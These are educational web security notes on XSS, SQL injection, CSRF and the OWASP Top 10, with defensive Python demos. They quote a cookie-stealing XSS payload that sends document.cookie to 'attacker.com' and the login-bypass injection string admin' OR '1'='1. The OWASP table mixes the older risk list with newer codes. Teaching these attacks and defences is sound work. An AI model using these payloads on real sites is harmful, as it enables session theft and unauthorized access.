Introduction

Web Security focuses on protecting web applications from attacks. Web applications are often the target of attacks because they are accessible to anyone on the internet.

Key Principle: Security of web applications crucially depends on sanitization of user input. Never trust user input!

Cross-Site Scripting (XSS)

XSS occurs when a web application returns user input in a page without encoding or filtering it, allowing execution of arbitrary JavaScript in the victim's browser.

Types of XSS

  • Reflected XSS: Malicious script supplied in the request (e.g. a URL parameter) and echoed straight back in the response
  • Stored XSS: Malicious script saved in the database and served to every user who later views it
  • DOM-based XSS: Client-side JavaScript writes attacker-controlled data into the DOM without encoding it

Example Attack

<script>document.location='attacker.com?c='+document.cookie</script>

This steals session cookies!

Real-World Impact

  • Cookie theft and session hijacking
  • Keylogging
  • Phishing
  • Defacement
  • The Samy Worm infected 1 million MySpace profiles using XSS

Prevention

  • Encode all user-controlled output for the context in which it is rendered
  • Use Content Security Policy (CSP)
  • Validate input with allowlists
  • Use HttpOnly cookies
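The following Python example is added here to show the four defences side by side; it is not code from the notes. It reflects a search term once without encoding and once with HTML encoding, runs the payload quoted above through both, applies an allowlist to a username field, and builds the CSP and HttpOnly cookie headers. The header values, the username pattern and the sample inputs are assumptions made for the demo.

```python
import html
import re

# Constructed demo input: the payload quoted in the notes above.
PAYLOAD = "<script>document.location='attacker.com?c='+document.cookie</script>"


def render_search_vulnerable(query: str) -> str:
    """Reflects the search term into the page verbatim: reflected XSS."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Encodes the term for an HTML text context, so the browser shows it as text."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def contains_script_tag(page: str) -> bool:
    """Check used by the demo: does the rendered HTML contain a live <script> element?"""
    return "<script" in page.lower()


# Allowlist for a username field (assumed policy: letters, digits, underscore, 1-32 chars).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_valid_username(value: str) -> bool:
    """Allowlist validation: reject anything that is not plainly a username."""
    return USERNAME_RE.fullmatch(value) is not None


def xss_defence_headers(session_id: str) -> dict:
    """Response headers (assumed values): a CSP that blocks inline scripts and
    an HttpOnly session cookie that document.cookie cannot read."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; Path=/",
    }


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
    print(xss_defence_headers("demo-session"))
```

Encoding and the CSP are complementary: encoding stops the payload from becoming markup at all, while the CSP blocks inline script execution if some other reflection point is missed, and HttpOnly limits what a successful script can steal.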

SQL Injection

SQL Injection exploits unsanitized user input in database queries, allowing attackers to interfere with database operations.

Example Attack

// Vulnerable query built by string concatenation
query = "SELECT * FROM users WHERE username = '" + username + "'"

// Attacker enters: admin' OR '1'='1
// Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1'
// The WHERE clause is always true, so the login check is bypassed!

Types of SQL Injection

  • In-band: Results of the injected query are returned directly in the application's response
  • Blind: No data is returned; results are inferred from the application's behavior
  • Out-of-band: Results are carried over a different channel than the application's response

Prevention

  • Use Prepared Statements (Parameterized Queries)
  • Input validation
  • Least privilege database accounts
  • Web Application Firewalls (WAF)

Exam Tip: The primary defense against SQL injection is using prepared statements with parameterized queries!
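The following Python example is added to make the exam tip concrete; it is not code from the notes. It builds a small in-memory SQLite table (constructed sample data), implements a login check once by string concatenation as in the example above and once with a parameterized query, and runs the quoted input admin' OR '1'='1 through both. The table layout, the account and the password handling (plaintext, for brevity only) are assumptions of the demo.

```python
import sqlite3

# Constructed demo input: the attacker string quoted in the notes above.
INJECTION = "admin' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the query by string concatenation, as in the notes' example:
    the user's text becomes part of the SQL syntax."""
    query = ("SELECT * FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Prepared statement: the values travel separately from the SQL text,
    so they can never change the query's structure."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run both login checks with correct credentials and with the injection."""
    conn = make_db()
    return {
        "vuln_correct_creds": login_vulnerable(conn, "admin", "hunter2"),
        "vuln_injected": login_vulnerable(conn, INJECTION, "wrong"),
        "safe_correct_creds": login_safe(conn, "admin", "hunter2"),
        "safe_injected": login_safe(conn, INJECTION, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

With the concatenated query the injected username turns the WHERE clause into username = 'admin' OR ('1'='1' AND password = 'wrong'), which matches the admin row regardless of the password; the parameterized version looks for a user literally named admin' OR '1'='1 and finds nothing.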

Cross-Site Request Forgery (CSRF)

CSRF exploits existing session cookies when a user visits a malicious site, triggering unauthorized actions.

How It Works

  1. User logs into banking site
  2. Session cookie is stored
  3. User visits malicious site
  4. Malicious site sends request to bank
  5. Browser includes session cookie
  6. Unauthorized action is performed

Prevention

  • Anti-CSRF tokens
  • Check Referer header
  • Use SameSite cookies
  • Require re-authentication for sensitive actions
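The following Python example is added to show how three of these defences interrupt the six-step sequence above; it is not code from the notes. It simulates a bank's transfer endpoint that issues a per-session anti-CSRF token, checks the Origin/Referer header, and sets a SameSite=Lax session cookie, then feeds it one request produced by the bank's own form and one forged by another site. The origin names, the HMAC-based token scheme and the request layout are assumptions of the demo.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real deployment loads this from configuration.
SERVER_KEY = secrets.token_bytes(32)
BANK_ORIGIN = "https://bank.example"   # assumed origin of the banking site


def issue_csrf_token(session_id: str) -> str:
    """Per-session anti-CSRF token: HMAC of the session id under the server key.
    It is embedded in the bank's forms; a page on another site cannot read it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted) -> bool:
    """Constant-time comparison; a missing or non-string token fails."""
    if not isinstance(submitted, str):
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def referer_allowed(headers: dict) -> bool:
    """Origin/Referer check: the request must come from the bank itself.
    A missing header is treated as a failure."""
    origin = headers.get("Origin") or headers.get("Referer") or ""
    return origin == BANK_ORIGIN or origin.startswith(BANK_ORIGIN + "/")


def session_cookie(session_id: str) -> str:
    """Set-Cookie value with SameSite=Lax: the browser does not attach it to
    cross-site POSTs, which stops step 5 of the sequence above."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def handle_transfer(request: dict) -> str:
    """Simulated POST /transfer handler; `request` carries cookies, headers and form."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return "401 not logged in"
    if not referer_allowed(request["headers"]):
        return "403 cross-site request"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return "403 missing or invalid CSRF token"
    return "200 transfer performed"


def legit_request(session_id: str) -> dict:
    """Constructed request produced by the bank's own transfer form."""
    return {"cookies": {"session": session_id},
            "headers": {"Origin": BANK_ORIGIN},
            "form": {"to": "bob", "amount": "100",
                     "csrf_token": issue_csrf_token(session_id)}}


def forged_request(session_id: str) -> dict:
    """Constructed request from a malicious site: the browser attaches the
    cookie (step 5), but the page cannot supply the token or a bank Origin."""
    return {"cookies": {"session": session_id},
            "headers": {"Origin": "https://evil.example"},
            "form": {"to": "mallory", "amount": "100"}}


if __name__ == "__main__":
    print("legit :", handle_transfer(legit_request("s1")))
    print("forged:", handle_transfer(forged_request("s1")))
    print("cookie:", session_cookie("s1"))
```

The token check is the primary defence because it does not depend on the browser: the forged request carries the victim's cookie but not the secret that only the bank's own page could embed. SameSite=Lax and the Origin check are layered on top so that a single missed form does not reopen the hole.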

OWASP Top 10

The OWASP Top 10 lists the most critical web application security risks:

Rank  Vulnerability                Description
1     A01: Injection               SQL, NoSQL, OS, LDAP injection
2     A02: Broken Auth             Compromised passwords, sessions
3     A03: Sensitive Data          Unprotected sensitive data
4     A04: XXE                     XML external entity attacks
5     A05: Broken Access           Authorization bypass
6     A06: Security Misconfig      Improper configurations
7     A07: XSS                     Cross-site scripting
8     A08: Insecure Deserial       Deserialization flaws
9     A09: Using Components        Vulnerable components
10    A10: Insufficient Logging    Lack of security monitoring